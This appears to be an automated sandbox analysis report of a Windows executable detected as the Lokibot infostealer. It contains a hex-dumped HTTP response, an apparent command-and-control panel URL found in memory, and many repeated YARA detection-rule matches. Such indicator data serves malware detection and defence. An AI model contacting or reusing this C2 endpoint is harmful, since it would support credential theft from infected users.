74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 18 Apr 2024 21:01:59 GMTServer: Apache/2.2.15 (CentOS)Last-Modified: Wed, 17 Apr 2024 06:00:48 GMTETag: "6164b-587-616449379118c"Accept-Ranges: bytesContent-Length: 1415Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c
            Source: lqoUUYTMsL.exe, 00000001.00000002.1680125185.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tequilacofradiamx.com/
            Source: lqoUUYTMsL.exe, lqoUUYTMsL.exe, 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
            Source: lqoUUYTMsL.exe, 00000001.00000002.1680125185.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tequilacofradiamx.com/minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php

            System Summary

            barindex
            Source: 0.2.lqoUUYTMsL.exe.6a83510.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 0.2.lqoUUYTMsL.exe.6a83510.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 0.2.lqoUUYTMsL.exe.6a83510.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 0.2.lqoUUYTMsL.exe.6a83510.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.lqoUUYTMsL.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 2.2.lqoUUYTMsL.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 2.2.lqoUUYTMsL.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 2.2.lqoUUYTMsL.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.lqoUUYTMsL.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 2.2.lqoUUYTMsL.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 2.2.lqoUUYTMsL.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 2.2.lqoUUYTMsL.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 2.2.lqoUUYTMsL.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.lqoUUYTMsL.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
            Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: Process Memory Space: lqoUUYTMsL.exe PID: 7104, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: Process Memory Space: lqoUUYTMsL.exe PID: 6408, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: lqoUUYTMsL.exeStatic PE information: section name: C)Ez
            Source: lqoUUYTMsL.exeStatic PE information: section name:
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B3B800_2_018B3B80
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018BA3B80_2_018BA3B8
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B29F80_2_018B29F8
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B8DF80_2_018B8DF8
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018BB2A00_2_018BB2A0
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B7E100_2_018B7E10
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B90280_2_018B9028
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B4A400_2_018B4A40
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B32680_2_018B3268
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B00700_2_018B0070
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B29890_2_018B2989
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B6D880_2_018B6D88
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B67910_2_018B6791
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B6B910_2_018B6B91
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B69900_2_018B6990
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B6BA00_2_018B6BA0
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B69A00_2_018B69A0
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B67A00_2_018B67A0
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B57B80_2_018B57B8
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B57C80_2_018B57C8
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B81C10_2_018B81C1
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B8DDC0_2_018B8DDC
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B7DD00_2_018B7DD0
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B1DD50_2_018B1DD5
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B61E00_2_018B61E0
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B61F00_2_018B61F0
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018BD1000_2_018BD100
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018BD3000_2_018BD300
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018BCB280_2_018BCB28
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018BD5300_2_018BD530
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B6D780_2_018B6D78
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B36880_2_018B3688
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018BC0C00_2_018BC0C0
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B78F10_2_018B78F1
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B4A0B0_2_018B4A0B
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B00060_2_018B0006
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B90180_2_018B9018
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B78270_2_018B7827
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B78400_2_018B7840
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B0E470_2_018B0E47
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B1E500_2_018B1E50
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_056A9D480_2_056A9D48
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_056A61010_2_056A6101
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_056A00700_2_056A0070
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_056A58400_2_056A5840
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_056A50180_2_056A5018
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_056A6F300_2_056A6F30
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_056A330F0_2_056A330F
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_056A45200_2_056A4520
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_056ABC580_2_056ABC58
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_056A5C500_2_056A5C50
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_056A00060_2_056A0006
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_056A34E20_2_056A34E2
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_056A44D50_2_056A44D5
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_056A7CB00_2_056A7CB0
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_056A8C880_2_056A8C88
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_056A349A0_2_056A349A
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_056A97C80_2_056A97C8
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_056AABA80_2_056AABA8
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_056A4F810_2_056A4F81
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_056A92700_2_056A9270
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_056A8E380_2_056A8E38
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 2_2_0040549C2_2_0040549C
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 2_2_004029D42_2_004029D4
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: String function: 0041219C appears 45 times
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: String function: 00405B6F appears 42 times
            Source: lqoUUYTMsL.exe, 00000000.00000002.1655933278.000000000565D000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameserver1.exe8 vs lqoUUYTMsL.exe
            Source: lqoUUYTMsL.exe, 00000000.00000002.1654064139.000000000134E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorwks.dllT vs lqoUUYTMsL.exe
            Source: lqoUUYTMsL.exe, 00000000.00000000.1634107526.0000000000D72000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameserver1.exe8 vs lqoUUYTMsL.exe
            Source: lqoUUYTMsL.exeBinary or memory string: OriginalFilenameserver1.exe8 vs lqoUUYTMsL.exe
            Source: lqoUUYTMsL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.2.lqoUUYTMsL.exe.6a83510.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 0.2.lqoUUYTMsL.exe.6a83510.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 0.2.lqoUUYTMsL.exe.6a83510.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 0.2.lqoUUYTMsL.exe.6a83510.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.lqoUUYTMsL.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 2.2.lqoUUYTMsL.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 2.2.lqoUUYTMsL.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 2.2.lqoUUYTMsL.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.lqoUUYTMsL.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 2.2.lqoUUYTMsL.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 2.2.lqoUUYTMsL.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 2.2.lqoUUYTMsL.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 2.2.lqoUUYTMsL.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.lqoUUYTMsL.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
